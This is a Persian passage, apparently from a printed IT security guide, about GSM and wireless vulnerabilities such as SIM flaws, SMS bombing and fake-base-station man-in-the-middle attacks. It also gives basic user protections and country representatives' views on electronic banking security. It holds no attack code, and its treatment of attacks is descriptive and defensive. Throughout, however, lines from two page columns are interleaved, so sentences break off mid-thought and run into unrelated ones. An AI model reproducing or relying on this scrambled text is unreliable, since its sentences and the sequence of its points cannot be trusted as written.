‫ﺩﻧﻴﺎ ﺩﺍﺷﺖ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﺑﺎ ﺳﺮﻋﺘﻲ ﻣﻌﺎﺩﻝ ﺳﻪ ﺑﺮﺍﺑﺮ ﺳﺮﻋﺖ‬ ‫ﺑﺎﻳﺪ ﺩﺭ ﺟﻬﺖ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﮔﺴﺘﺮﺵ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﻧﻴﺰ ﻣﺎﻧﻨـﺪ ﺳـﺎﻳﺮ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻗﺪﺍﻡ ﻛﻨﻨﺪ‪.‬‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻧﺴﺒﺖ ﺑﻪ ﺗﻜـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣﺜـﻞ‬
‫ﺩﻭﻡ‪ ،‬ﻫﻤﻜﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﺮﻱ ﻋﺎﺩﻱ ﻭ ﻫﻤﻴﺸﮕﻲ ﺗﺒـﺪﻳﻞ ﺷـﻮﺩ؛‬
‫ﺗﺮﺍﻭﺍﻫﺎ‪ ،‬ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺁﺳـﻴﺐﭘـﺬﻳﺮ‬
‫ﺑﺨﺼﻮﺹ ﺑﺎ ﻋﻨﺎﻳﺖ ﺧﺎﺹ ﺑﻪ ﺭﻓﻊ ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﻣﺘﻮﺟـﻪ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧـﺼﻤﺎﻧﺔ ﺍﻳﻨﺘﺮﻧـﺖ‪ ،‬ﭘﺎﺷـﻨﺔ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻋﻤﻮﻡ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺖ‪.‬‬
‫ﻻ ﺍﺗـﺼﺎﻝ ﺑـﻲﺳـﻴﻢ‬ ‫ﺁﺷﻴﻞ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺿــﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘــﺔ ﺯﻧﺠﻴــﺮ ﺍﻣﻨﻴﺘــﻲ ﻣﺤــﺴﻮﺏ ﻣــﻲﺷــﻮﺩ‪.‬‬ ‫ﺳﻮﻡ‪ ،‬ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺁﻣﻮﺯﺷـﻲ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﻭ ﻣﻤﻴـﺰﺍﻥ ﻗـﺴﻤﺖ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ GSM‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻛـﺎﺭﺕ ‪،SIM‬‬ ‫ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺍﺯ ﺍﻭﻟﻮﻳﺖ ﺑـﺎﻻﻳﻲ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﺩﻭﻟـﺖ‬
‫ﺑﻤﺒﺎﺭﺍﻥ ‪ ،SMS‬ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ ،WAP‬ﻭ ﻧﻴﺰ ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺑـﺎ‬ ‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺗﻌﺮﻳﻒ ﻭ ﮔﺴﺘﺮﺓ ﻋﻤﻠﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳـﺪ ﺷـﺎﻣﻞ‬
‫‪٢٣٦‬‬ ‫ﻲ ﺗﻬﺪﻳــﺪﺍﺕ‬
‫ﺍﻧــﻮﺍﻉ ﻣﺨــﺎﻃﺮﺍﺕ ﺳــﺎﻳﺒﺮ ﺑﻌــﻼﻭﺓ ﺍﹶﺷــﻜﺎﻝ ﺳــﻨﺘ ﹺ‬
‫ﻧﺎﻡ "‪ "man in the middle‬ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﺍﻳﻤﻦﺳﺎﺯﻱ ﻛﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﻣﻤﻜـﻦ ﻧﻴـﺴﺖ‪ ،‬ﺍﻣـﺎ‬
‫ﻛﺎﺭﺑﺮ ﺑﺎ ﭼﻨﺪ ﮔﺎﻡ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﻌﻤﻞ ﺁﻭﺭﺩ‪:‬‬
‫ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ‬
‫ﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ؛‬ ‫•‬
‫ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ؛‬ ‫•‬ ‫ﺩﺭ ﺣﺎﻟﻲ ﻛﻪ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣـﺮﺯ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ ﻭ‬
‫ﻧﺼﺐ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺷﺨﺼﻲ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ؛‬ ‫•‬ ‫ﺍﺳﺘﻌﺪﺍﺩﻫﺎﻱ ﻣﺤﻠﻲ ﺭﺷﺪ ﻣﻲﻛﻨﺪ‪ ،‬ﺭﺟﻮﻉ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺑـﺮﺍﻱ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻪ ﻳﻚ ﻛﺎﺭ ﺭﺍﻳﺞ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﺧﺼﻮﺻﹰﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﻣﻨﺎﺑﻊ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ‪ ،‬ﻫـﻢ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﻫـﻢ‬
‫‪ ۲۳۶‬ﺩﺭ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻳﻚ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤـﺮﺍﻩ ﻣﻌﺮﻓـﻲ ﻣـﻲﻛﻨـﺪ ﻭ‬ ‫ﻓﺮﺻﺘﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ ﻣﻬـﺎﺟﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺪﺯﺩﺩ‪ .‬ﺍﻃﻼﻋـﺎﺕ ﺩﺭ‬ ‫ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺟﻬـﺖ ﻛـﺎﻫﺶ ﺗﻬﺪﻳـﺪ ﻫـﺎﻱ‬
‫ﻼ ﺧﺎﻟﺺ ﻭ ﺑﺪﻭﻥ ﻫﺮﮔﻮﻧﻪ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ‬ ‫‪gateway‬ﻫﺎ ﻛﺎﻣ ﹰ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺗﻮﻓﻴﻖ ﺍﺟﺒﺎﺭﻱ ﺑﺮﺍﻱ‬
‫ﺍﻳﻦ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﺰﺭﮔﻲ‬
‫ﺭﻭﺑﺮﻭ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺑﺎﻧﻜﻬﺎ ﺩﺍﻧﺴﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻭﺍﻛﻨـﺸﻲ‬
‫‪٢٢٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﭘﺎﺳﺦ‬ ‫ﺍﻃﻤﻴﻨــﺎﻥ ﺍﺯ ﻧﮕﻬــﺪﺍﺭﻱ ﺍﻳﻤــﻦ ﺍﺯ ﻭﺳــﺎﻳﻞ‪ ،‬ﻭ ﺣﻔﺎﻇــﺖ ﺍﺯ‬ ‫•‬


‫ﻳﻚ ﻧﻤﺎﻳﻨﺪﺓ ﻛﺸﻮﺭ ﺳﻨﮕﺎﭘﻮﺭ‪ ،‬ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﭘﻴـﺸﻨﻬﺎﺩ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ؛‬
‫ﺟﺮﻳﻤﻪﻫﺎﻱ ﺷﺪﻳﺪ ﺍﺩﺍﺭﻱ ﻭ ﺑـﻪﺭﻭﺯﻛـﺮﺩﻥ ﻣﻘـﺮﺭﺍﺕ ﺩﺭ ﻓﻮﺍﺻـﻞ‬ ‫ﻧﺼﺐ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ‪ .VPN‬ﺩﺭ ﻣﻮﺭﺩ ﻛﺎﺭﺗﻬـﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﻧﻴـﺰ‬ ‫•‬
‫ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺭﺍ ﺩﺍﺩ؛ ﭼﺮﺍﻛﻪ ﻣﻌﺘﻘﺪ ﺑﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﻣﺜﻞ "ﻗﺎﻧﻮﻥ ﺳﻮﺀ‬ ‫ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﻧﺒﺎﻳﺪ ﺷﻤﺎﺭﻩﻫﺎﻱ ‪ PIN‬ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪ"‪ ،‬ﻓﺎﻳﺪﺓ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺗﺸﺨﻴﺺ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ‬
‫ﻛﺎﻫﺶ ﺟﺎﺫﺑﺔ ﺁﻥ ﺑﺮﺍﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻏﻴﺮﺣﺮﻓﻪﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ‪.‬‬ ‫ﺳﺨﻨﺮﺍﻧﻴﻬﺎﻱ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛﺸﻮﺭﻫﺎ‬
‫ﻳﻚ ﻧﻤﺎﻳﻨﺪﺓ ‪ FBI‬ﻧﻴﺰ ﺑﻴﺎﻥ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﻳﻚ ﭘﺪﻳـﺪﺓ ﺍﺟﺘﻤـﺎﻋﻲ‬ ‫ﺩﺭ ﻃﻮﻝ ﺑﺮﮔـﺰﺍﺭﻱ ﺍﻳـﻦ ﻧﺸـﺴﺖ ﺟﻬـﺎﻧﻲ ﺍﺯ ﻧﻤﺎﻳﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺔ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﻏﻴﺮﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻣﺮﺯﻫﺎ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﻣـﻮﺍﺭﺩ ﻓـﺮﺩ‬ ‫ﻛﺸﻮﺭﻫﺎ ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛﻪ ﺑﻪ ﺳﻪ ﺳﺆﺍﻝ ﺯﻳﺮ ﭘﺎﺳﺦ ﺩﻫﻨﺪ‪:‬‬
‫ﺧﻄﺎﻛﺎﺭ ﺷﺪﺕ ﺟﺮﻣﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺭﺗﻜﺎﺏ ﺁﻥ ﺍﺳﺖ ﺭﺍ ﺗﺸﺨﻴﺺ‬ ‫ﺩﺭ ﺯﻣﻴﻨﺔ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻪ ﻧﮕﺮﺷـﻬﺎﻳﻲ‬ ‫‪.۱‬‬
‫ﻧﻤﻲﺩﻫﺪ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﻌﻀﻲ ﺍﻓـﺮﺍﺩ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ‬ ‫ﻣﻲ ﺑﻴﻨﻴﺪ؟ ﺑﺰﺭﮔﺘﺮﻳﻦ ﭼﺎﻟﺸﻬﺎ ﻳﺎ ﺁﺳﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎ ﻛﺪﺍﻣﻨـﺪ؟‬
‫ﺟﺮﻡ ﻭﺍﻗﻌﻲ ﺑﻪ ﺭﺳﻤﻴﺖ ﻧﻤﻲﺷﻨﺎﺳﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ ﺑﺎﻧﻜﻬـﺎ ﻫـﻢ ﺑـﺮﺍﻱ‬ ‫)ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‪ ،‬ﭘﻮﻟـﺸﻮﻳﻲ ﺍﻳﻨﺘﺮﻧﺘـﻲ‪ ،‬ﻳـﺎ ﺳـﺎﻳﺮ‬
‫ﺟﺬﺏ ﻣﺸﺘﺮﻱ ﺑﻴﺸﺘﺮ ﺍﻳﻨﻄﻮﺭ ﻭﺍﻧﻤﻮﺩ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻓﺴﺎﻧﺔ ﺍﻣﻨﻴـﺖ‬ ‫ﺍﹶﺷﻜﺎﻝ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(‬
‫ﺭﺍ ﺟﺎﻭﺩﺍﻧﻲ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺷـﻨﺎﺧﺖ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬ ‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﻛﺸﻮﺭ ﺷﻤﺎ ﺍﺯ ﭼـﻪ‬ ‫‪.۲‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺩﺍﺩﻩ ﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﻣـﺴﺪﻭﺩ ﻛـﺮﺩﻥ‬ ‫ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺗﻨﻬــﺎ ﻣــﺸﻜﻼﺕ ﺭﺍ ﺣــﺎﺩﺗﺮ ﻣــﻲﻛﻨــﺪ‪ .‬ﺑﺨــﺼﻮﺹ‪،‬‬ ‫ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﻭ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺍ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺧﻮﺩ‬
‫ﻣــﺸﻜﻼﺕ ﺷــﮕﺮﻓﻲ ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﻃﺒﻴﻌــﺖ ﻓﺮﺍﺑﺨــﺸﻲ ﺟــﺮﺍﺋﻢ‬ ‫ﺩﺭﻧﻈﺮ ﺩﺍﺭﻧﺪ؟‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺳﺎﻳﺒﺮ ﻭ ﺩﺳﺘﻜﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ‬ ‫ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺟﺎﻧﺒﻪ ﻭ ﭼﻨﺪﻣﻠﻴﺘﻲ ﭼﻄـﻮﺭ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺎ‬ ‫‪.۳‬‬
‫ﺑﺎﻧﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ‬ ‫ﻫﻤﻜﺎﺭﻱ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﻨﺪ؟‬
‫ﻻﺯﻡ ﺍﺳﺖ‪.‬‬
‫ﺑﺮﺯﻳﻞ‬
‫ﻣﻜﺰﻳﻚ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﺑﺮﺯﻳﻞ ﺧﺎﻃﺮﻧﺸﺎﻥ ﻛﺮﺩ ﻛﻪ ﺭﻗﺎﺑﺖ‪ ،‬ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﻪ ﺳﺎﺧﺖ‬
‫ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﻧﮕﺮﺷــﻬﺎﻱ ﻣﻤﻜــﻦ ﺩﺭ ﺭﺧــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴــﺖ‬ ‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﻫﺪﺍﻳﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﻳـﻦ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﺴﺘﻌﺪ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻣﻜﺰﻳــﻚ ﺍﺷــﺎﺭﻩ ﻛــﺮﺩ ﻛــﻪ ﺍﻣﻜــﺎﻥ ﺩﺳﺘﺮﺳــﻲ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻫﺴﺘﻨﺪ‪ .‬ﻣﻴﺎﻥ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺯ ﻳـﻚ ﺳـﻮ ﻭ‬
‫ﺑﻪﺷﻤﺎﺭﻩﻫﺎﻱ ‪ PIN‬ﺍﺯ ﻃﺮﻳﻖ ﻭﺏ ﺭﻭ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ ﻭ ﺍﻳـﻦ‬ ‫ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ‪ ،‬ﻳﻚ ﺗـﻮﺍﺯﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻛـﺎﺭﺁﻳﻲ‬
‫ﻣﺴﺌﻠﻪ ﺟﺪﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﻫﺮ ﺻـﻮﺭﺕ ﺁﻧﻬـﺎ‬ ‫ﻓﻨﻮﻥ ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ ﺩﻭﺭﻩﻫـﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺩﺭ ﺑﺮﺯﻳـﻞ‬
‫ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﻛﻨﻨﺪ‪،‬‬ ‫ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪.‬‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻇﺮﻓﻴﺘﻬﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻗـﻮﻱ ﺩﺍﺭﻧـﺪ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﺍﻳــﻦ ﺳــﺆﺍﻝ ﻛــﻪ ﻣﺆﺳــﺴﺎﺕ ﭼﻨــﺪﻣﻠﻴﺘﻲ ﭼﮕﻮﻧـﻪ‬
‫ﺍﻣﻨﻴﺘ ـﻲ ﻭ ﻧﻈــﺎﺭﺗﻲ ﺑــﺴﻴﺎﺭﻱ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﻓﻨــﺎﻭﺭﻱ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺸﻮﺭﻫﺎ ﻛﻤﻚ ﻛﻨﻨﺪ‪ ،‬ﺑﺮﺯﻳﻠﻲ ﻫﺎ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﻪ ﺩﺭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﺨﺼﺺ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ ﻣﻜﺰﻳﻚ ﺗﻮﺻـﻴﻪﻫـﺎﻱ‬
‫ﺯﻣﻴﻨﻪﻫﺎﻱ ﺯﻳﺮ ﺑﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﺷـﻮﺩ‪ :‬ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ‬
‫‪ BASEL‬ﺭﺍ ﺑﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﻟﺤـﺎﻅ ﻛـﺮﺩﻩ‬
‫ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ‪ ،‬ﺗﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ‪ ،‬ﻭ‬
‫ﺍﺳﺖ‪.‬‬
‫ﻧﻴﺰ ﺍﻳﺠﺎﺩ ﻣﺪﻟﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺑﺎ ﺣﺪﺍﻗﻞ ﻗﻮﺍﻧﻴﻦ ﺑﺎﻧﻜﻲ‪.‬‬
‫ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺳﺆﺍﻝ ﺳﻮﻡ‪ ،‬ﻣﻜﺰﻳﻜﻲﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻦ‬
‫ﺗﺠﺮﺑﻴﺎﺕ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲﻫﺎ ﻭ ﻧﻴﺎﺯﻫﺎ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺟﻬـﺎﻧﻲ‬ ‫ﭘﺮﺳﺶ‬
‫ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺒﺎﺩﻟﻪ ﺷﻮﺩ‪.‬‬ ‫ﺑﺮﺯﻳﻠﻲﻫﺎ ﭘﺮﺳﻴﺪﻧﺪ ﻛﻪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻃﺒﻴﻌﺖ ﭘﻮﻳﺎ ﻭ ﭘﻴﺸﺮﻓﺖ ﺳﺮﻳﻊ‬
‫ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺭﺍ ﻣﺸﻜﻞ ﺳـﺎﺧﺘﻪ‪ ،‬ﭼﮕﻮﻧـﻪ ﻣـﻲ ﺗـﻮﺍﻥ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﺮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٢٤‬‬

‫ﺍﺳﺎﺳﻲ ﻫﺴﺘﻨﺪ؛ ﺧﺼﻮﺻﹰﺎ ﻭﻗﺘﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪.‬‬ ‫ﭘﺮﺳﺶ‬


